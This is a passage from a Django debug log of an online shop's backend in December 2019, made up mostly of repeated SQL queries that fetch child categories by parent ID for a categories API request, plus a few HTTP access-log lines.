ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:11:51,035 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:11:51,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:11:51,043 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:11:51,047 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:11:51,051 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:11:51,058 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:11:51,062 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:11:51,066 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:11:51,070 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:11:51,074 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:11:51,078 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:11:51,083 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:11:51,087 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:11:51,091 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:11:51,096 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:11:51,100 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:11:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 10:13:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 10:17:42,662 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:17:42,673 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:17:42,679 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:17:42,683 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:17:42,689 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:17:42,693 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:17:42,697 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:17:42,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:17:42,705 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:17:42,710 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:17:42,714 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:17:42,718 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:17:42,722 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:17:42,726 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:17:42,731 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:17:42,735 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:17:42,739 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:17:42,743 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:17:42,747 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:17:42,753 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:17:42,758 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:17:42,761 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:17:42,764 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:17:42,766 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:17:42,768 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:17:42,771 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:17:42,774 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:17:42,776 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:17:42,778 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:17:42,780 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:17:42,784 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:17:42,786 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:17:42,788 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:17:42,790 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:17:42,793 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:17:42,796 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:17:42,799 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:17:42,801 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:17:42,804 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:17:42,807 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:17:42,811 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:17:42,816 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:17:42,819 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:17:42,823 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:17:42,828 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:17:42,831 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:17:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 10:17:48,367 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:17:48,375 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:17:48,380 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:17:48,383 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:17:48,388 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 